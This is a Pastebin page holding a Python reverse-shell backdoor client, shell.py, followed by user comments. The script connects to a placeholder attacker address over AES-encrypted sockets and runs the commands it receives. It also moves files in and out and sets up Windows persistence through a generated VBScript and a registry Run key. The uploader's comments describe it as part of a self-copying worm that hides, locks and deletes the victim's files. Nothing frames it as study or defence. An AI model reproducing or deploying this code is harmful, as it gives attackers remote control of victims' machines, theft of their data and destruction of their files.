FlyFar

shell.py

Jun 6th, 2023
228
0
Never
3
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.66 KB | Cybersecurity | 0 0
  1. #!/usr/bin/python
  2.  
  3. from Crypto.Cipher import AES
  4. import subprocess, socket, base64, time, os, sys, urllib2, pythoncom  
  5.  
  6. # the block size for the cipher object; must be 16, 24, or 32 for AES
  7. BLOCK_SIZE = 32
  8.  
  9. # one-liners to encrypt/encode and decrypt/decode a string
  10. # encrypt with AES, encode with base64
  11. EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
  12. DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))
  13.  
  14. # generate a random secret key
  15. secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"
  16.  
  17. # server config
  18. HOST = 'Your.IP.Address.Here'
  19. PORT = 6000
  20.  
  21. # session controller
  22. active = False
  23.  
  24. # Functions
  25. ###########
  26.  
  27. # send data function
  28. def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
  29.     sock.sendall(EncodeAES(cipher, cmd + end))
  30.    
  31. # receive data function
  32. def Receive(sock, end="EOFEOFEOFEOFEOFX"):
  33.     data = ""
  34.     l = sock.recv(1024)
  35.     while(l):
  36.         decrypted = DecodeAES(cipher, l)
  37.         data = data + decrypted
  38.         if data.endswith(end) == True:
  39.             break
  40.         else:
  41.             l = sock.recv(1024)
  42.     return data[:-len(end)]
  43.  
  44. # prompt function
  45. def Prompt(sock, promptmsg):
  46.     Send(sock, promptmsg)
  47.     answer = Receive(sock)
  48.     return answer
  49.  
  50. # upload file
  51. def Upload(sock, filename):
  52.     bgtr = True
  53.     # file transfer
  54.     try:
  55.         f = open(filename, 'rb')
  56.         while 1:
  57.             fileData = f.read()
  58.             if fileData == '': break
  59.             # begin sending file
  60.             Send(sock, fileData, "")
  61.         f.close()
  62.     except:
  63.         time.sleep(0.1)
  64.     # let server know we're done..
  65.     time.sleep(0.8)
  66.     Send(sock, "")
  67.     time.sleep(0.8)
  68.     return "Finished download."
  69.    
  70. # download file
  71. def Download(sock, filename):
  72.     # file transfer
  73.     g = open(filename, 'wb')
  74.     # download file
  75.     fileData = Receive(sock)
  76.     time.sleep(0.8)
  77.     g.write(fileData)
  78.     g.close()
  79.     # let server know we're done..
  80.     return "Finished upload."
  81.  
  82. # download from url (unencrypted)
  83. def Downhttp(sock, url):
  84.     # get filename from url
  85.     filename = url.split('/')[-1].split('#')[0].split('?')[0]
  86.     g = open(filename, 'wb')
  87.     # download file
  88.     u = urllib2.urlopen(url)
  89.     g.write(u.read())
  90.     g.close()
  91.     # let server know we're done...
  92.     return "Finished download."
  93.    
  94.  
  95.            
  96. # persistence
  97. def Persist(sock, redown=None, newdir=None):
  98.  
  99.     # Windows/NT Methods
  100.     if os.name == 'nt':
  101.        
  102.             # fetch executable's location
  103.             exedir = os.path.join(sys.path[0], sys.argv[0])
  104.             exeown = exedir.split('\\')[-1]
  105.            
  106.             # get vbscript location
  107.             vbsdir = os.getcwd() + '\\' + 'vbscript.vbs'
  108.            
  109.             # write VBS script
  110.             if redown == None: vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nWhile state = 1\nexist = ReportFileStatus(wshname)\nIf exist = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nElse\nWshShell.Run """' + exedir + '""",hidden\nwscript.sleep 50000\nEnd If\nvFound = False\nElse\nwscript.sleep 50000\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\n'
  111.             else:
  112.                 if newdir == None:
  113.                     newdir = exedir
  114.                     newexe = exeown
  115.                 else:
  116.                     newexe = newdir.split('\\')[-1]
  117.                 vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nurlname = "' + redown + '"\ndirname = "' + newdir + '"\nWhile state = 1\nexist1 = ReportFileStatus(wshname)\nexist2 = ReportFileStatus(dirname)\nIf exist1 = False And exist2 = False then\ndownload urlname, dirname\nEnd If\nIf exist1 = True Or exist2 = True then\nif exist1 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nexist2 = False\nend if\nif exist2 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(dirname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" OR objProcess.name = "' + newexe + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nEnd If\nIf vFound = False then\nIf exist1 = True then\nWshShell.Run """' + exedir + '""",hidden\nEnd If\nIf exist2 = True then\nWshShell.Run """' + dirname + '""",hidden\nEnd If\nwscript.sleep 50000\nEnd If\nvFound = False\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\nfunction download(sFileURL, sLocation)\nSet objXMLHTTP = CreateObject("MSXML2.XMLHTTP")\nobjXMLHTTP.open "GET", sFileURL, false\nobjXMLHTTP.send()\ndo until objXMLHTTP.Status = 200 :  wscript.sleep(1000) :  loop\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject("ADODB.Stream")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject("Scripting.FileSystemObject")\nIf objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile sLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nEnd function\n'
  118.            
  119.             # open file & write
  120.             vbs = open('vbscript.vbs', 'wb')
  121.             vbs.write(vbscript)
  122.             vbs.close()
  123.            
  124.             # add registry to startup
  125.             persist = Exec('reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v blah /t REG_SZ /d "' + vbsdir + '"')
  126.             persist += '\nPersistence complete.\n'
  127.             return persist
  128.            
  129. # execute command
  130. def Exec(cmde):
  131.     # check if command exists
  132.     if cmde:
  133.         execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  134.         cmdoutput = execproc.stdout.read() + execproc.stderr.read()
  135.         return cmdoutput
  136.        
  137.     # otherwise, return
  138.     else:
  139.         return "Enter a command.\n"
  140.    
  141.        
  142. # main loop
  143. while True:
  144.     try:
  145.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  146.         s.connect((HOST, PORT))
  147.          
  148.         # create a cipher object using the random secret
  149.         cipher = AES.new(secret,AES.MODE_CFB,'0000000000000000')
  150.  
  151.         # waiting to be activated...
  152.         data = Receive(s)
  153.    
  154.         # activate.
  155.         if data == 'Activate':
  156.             active = True
  157.             Send(s, "\n"+os.getcwd()+">")
  158.        
  159.         # interactive loop
  160.         while active:
  161.            
  162.             # Receive data
  163.             data = Receive(s)
  164.  
  165.             # think before you type smartass
  166.             if data == '':
  167.                 time.sleep(0.02)
  168.            
  169.             # check for quit
  170.             if data == "quit" or data == "terminate":
  171.                 Send(s, "quitted")
  172.                 break
  173.                
  174.             # check for change directory
  175.             elif data.startswith("cd ") == True:
  176.                 try:
  177.                     os.chdir(data[3:])
  178.                     stdoutput = ""
  179.                 except:
  180.                     stdoutput = "Error opening directory.\n"
  181.                
  182.             # check for download
  183.             elif data.startswith("download") == True:
  184.                 # Upload the file
  185.                 stdoutput = Upload(s, data[9:])
  186.            
  187.             elif data.startswith("downhttp") == True:
  188.                 # Download from url
  189.                 stdoutput = Downhttp(s, data[9:])
  190.  
  191.             # check for upload
  192.             elif data.startswith("upload") == True:
  193.                 # Download the file
  194.                 stdoutput = Download(s, data[7:])
  195.                
  196.             elif data.startswith("persist") == True:
  197.                 # Attempt persistence
  198.                 if len(data.split(' ')) == 1: stdoutput = Persist(s)
  199.                 elif len(data.split(' ')) == 2: stdoutput = Persist(s, data.split(' ')[1])
  200.                 elif len(data.split(' ')) == 3: stdoutput = Persist(s, data.split(' ')[1], data.split(' ')[2])
  201.            
  202.                    
  203.             else:
  204.                 # execute command.
  205.                 stdoutput = Exec(data)
  206.                
  207.             # send data
  208.             stdoutput = stdoutput+"\n"+os.getcwd()+">"
  209.             Send(s, stdoutput)
  210.            
  211.         # loop ends here
  212.        
  213.         if data == "terminate":
  214.             break
  215.         time.sleep(3)
  216.     except socket.error:
  217.         s.close()
  218.         time.sleep(10)
  219.         continue
  220.          
Comments
  • ameerjad
    1 year
    # text 0.02 KB | 0 0
    1. its not work bro
    • FlyFar
      1 year
      # text 0.10 KB | 0 0
      1. It needs two other files, worm.py, and server.py to run. You can try to find it in my account page
    • FlyFar
      1 year
      # text 0.42 KB | 0 0
      1. The worm is implemented in Python. Worm utilizes the client-server architecture to create a backdoor on a client's machine where attackers will have a reverse shell on their machine. The worm makes all .txt files read-only, hides all .exe files, and deletes any other file these files are also encrypted using AES. The worm copies itself into various "copy folders" and also can copy itself to the C drive of the victim's machine.
Add Comment
Please, Sign In to add comment